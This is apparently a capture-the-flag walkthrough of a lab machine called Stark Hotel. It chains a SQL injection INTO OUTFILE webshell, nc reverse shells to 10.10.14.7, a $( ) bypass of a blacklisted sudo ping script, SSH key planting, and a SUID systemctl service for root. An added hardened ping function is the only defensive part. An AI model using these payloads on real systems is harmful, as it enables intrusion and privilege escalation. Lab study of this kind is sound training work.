Basic information

Port scan

A full port scan is needed; it turns up 64999 (although that port isn't really used):

$ nmap -p- --min-rate=1000 10.10.10.143
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-07 13:19 CST
Nmap scan report for 10.10.10.143
Host is up (0.071s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
45505/tcp filtered unknown
64999/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 1008.70 seconds

$ nmap -sC -sV -p 22,80,64999 10.10.10.143
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-07 13:19 CST
Nmap scan report for 10.10.10.143
Host is up (0.082s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
64999/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.72 seconds

80

A hotel site:

64999

Visiting it directly shows a "banned for 90 seconds" message:

SQL injection

The web app on port 80 has a very basic SQL injection:

sqli to webshell

load_file and INTO OUTFILE can read and write files, so a webshell can be written directly:

http://10.10.10.143/room.php?cod=-1 union select 1,'<?php system($_GET["cmd"]);?>',3,4,5,6,7 into outfile '/var/www/html/miao.php'

reverse shell

The server has nc, so a reverse shell can be obtained directly:

10.10.10.143/miao.php?cmd=nc -e /bin/bash 10.10.14.7 4445

python -c 'import pty;pty.spawn("/bin/bash")'

Information gathering

The current user is www-data; sudo -l shows that /var/www/Admin-Utilities/simpler.py can be run as pepper without a password:

Command injection

Looking at this file, there is an exec_ping function that passes our input straight into os.system as part of the command string, guarded only by a simple blacklist:

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

But since $( is not on the list, the $(cmd) form still executes commands:

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

Enter an IP: $(whoami).test.com
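As an added example (not part of the original writeup or the box's simpler.py), the original blacklist is reproduced beside a hardened version: a strict allowlist via the ipaddress module plus an argv-list subprocess call with no shell. The page's $(whoami).test.com input passes the blacklist but fails the allowlist; the `runner` parameter is my own addition so the function can be exercised without network access.

```python
import ipaddress
import subprocess

# The blacklist from simpler.py's exec_ping, kept for comparison.
FORBIDDEN = ['&', ';', '-', '`', '||', '|']

def passes_blacklist(command):
    """Reproduce the original check: True means the input would reach os.system()."""
    return not any(token in command for token in FORBIDDEN)

def validate_ip(command):
    """Allowlist check: accept only a literal IPv4/IPv6 address, otherwise None."""
    try:
        return str(ipaddress.ip_address(command.strip()))
    except ValueError:
        return None

def safe_ping(command, runner=subprocess.run):
    """Ping a validated address without involving a shell.

    `runner` defaults to subprocess.run; it is injectable (assumed helper, not
    from the page) so the logic can be tested offline. Returns the ping exit
    code, or None when the input is rejected.
    """
    ip = validate_ip(command)
    if ip is None:
        return None
    # argv list + shell=False: the address is a single argument that /bin/sh
    # never parses, so $(...), backticks or pipes cannot be interpreted.
    result = runner(['ping', '-c', '1', ip], shell=False,
                    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return result.returncode

if __name__ == '__main__':
    payload = '$(whoami).test.com'   # the bypass shown on this page
    print('blacklist lets it through:', passes_blacklist(payload))      # True
    print('allowlist accepts it:', validate_ip(payload) is not None)    # False
```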

simpler.py

#!/usr/bin/env python3
from datetime import datetime
import sys
import os
from os import listdir
import re

def show_help():
    message='''
********************************************************
* Simpler - A simple simplifier ;) *
* Version 1.0 *
********************************************************
Usage: python3 simpler.py [options]

Options:
    -h/--help : This help
    -s : Statistics
    -l : List the attackers IP
    -p : ping an attacker IP
'''
    print(message)

def show_header():
    print('''***********************************************
 _ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_| |_| |___/
@ironhackers.es

***********************************************
''')

def show_statistics():
    path = '/home/pepper/Web/Logs/'
    print('Statistics\n-----------')
    listed_files = listdir(path)
    count = len(listed_files)
    print('Number of Attackers: ' + str(count))
    level_1 = 0
    dat = datetime(1, 1, 1)
    ip_list = []
    reks = []
    ip = ''
    req = ''
    rek = ''
    for i in listed_files:
        f = open(path + i, 'r')
        lines = f.readlines()
        level2, rek = get_max_level(lines)
        fecha, requ = date_to_num(lines)
        ip = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if fecha > dat:
            dat = fecha
            req = requ
            ip2 = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if int(level2) > int(level_1):
            level_1 = level2
            ip_list = [ip]
            reks=[rek]
        elif int(level2) == int(level_1):
            ip_list.append(ip)
            reks.append(rek)
        f.close()

    print('Most Risky:')
    if len(ip_list) > 1:
        print('More than 1 ip found')
    cont = 0
    for i in ip_list:
        print(' ' + i + ' - Attack Level : ' + level_1 + ' Request: ' + reks[cont])
        cont = cont + 1

    print('Most Recent: ' + ip2 + ' --> ' + str(dat) + ' ' + req)

def list_ip():
    print('Attackers\n-----------')
    path = '/home/pepper/Web/Logs/'
    listed_files = listdir(path)
    for i in listed_files:
        f = open(path + i,'r')
        lines = f.readlines()
        level,req = get_max_level(lines)
        print(i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3] + ' - Attack Level : ' + level)
        f.close()

def date_to_num(lines):
    dat = datetime(1,1,1)
    ip = ''
    req=''
    for i in lines:
        if 'Level' in i:
            fecha=(i.split(' ')[6] + ' ' + i.split(' ')[7]).split('\n')[0]
            regex = r'(\d+)-(.*)-(\d+)(.*)'
            logEx=re.match(regex, fecha).groups()
            mes = to_dict(logEx[1])
            fecha = logEx[0] + '-' + mes + '-' + logEx[2] + ' ' + logEx[3]
            fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
            if fecha > dat:
                dat = fecha
                req = i.split(' ')[8] + ' ' + i.split(' ')[9] + ' ' + i.split(' ')[10]
    return dat, req

def to_dict(name):
    month_dict = {'Jan':'01','Feb':'02','Mar':'03','Apr':'04', 'May':'05', 'Jun':'06','Jul':'07','Aug':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}
    return month_dict[name]

def get_max_level(lines):
    level=0
    for j in lines:
        if 'Level' in j:
            if int(j.split(' ')[4]) > int(level):
                level = j.split(' ')[4]
                req=j.split(' ')[8] + ' ' + j.split(' ')[9] + ' ' + j.split(' ')[10]
    return level, req

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

if __name__ == '__main__':
    show_header()
    if len(sys.argv) != 2:
        show_help()
        exit()
    if sys.argv[1] == '-h' or sys.argv[1] == '--help':
        show_help()
        exit()
    elif sys.argv[1] == '-s':
        show_statistics()
        exit()
    elif sys.argv[1] == '-l':
        list_ip()
        exit()
    elif sys.argv[1] == '-p':
        exec_ping()
        exit()
    else:
        show_help()
        exit()

pepper shell

So just spawn a reverse shell as pepper:

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

$(/tmp/miao.sh)

python -c 'import pty;pty.spawn("/bin/bash")'

ssh key

To make later work easier, an SSH public key can be written in directly:

mkdir .ssh
cd .ssh
echo 'ssh-rsa *****' > authorized_keys

miao.sh

echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.14.7 4446' > /tmp/miao.sh

chmod +x /tmp/miao.sh

user flag

user.txt is in the pepper user's home directory:

Privilege escalation information

systemctl has the SUID bit set:

find / -perm -u=s -type f 2>/dev/null

Exploitation method:

Create a service unit that executes a command.

miao.service

[Service]
Type=oneshot
ExecStart=/bin/bash -c 'nc -e /bin/bash 10.10.14.7 4447'

[Install]
WantedBy=multi-user.target

Privilege escalation &amp; root flag

systemctl link /tmp/miao.service
systemctl enable --now /tmp/miao.service

This gives a root shell; read root.txt:

References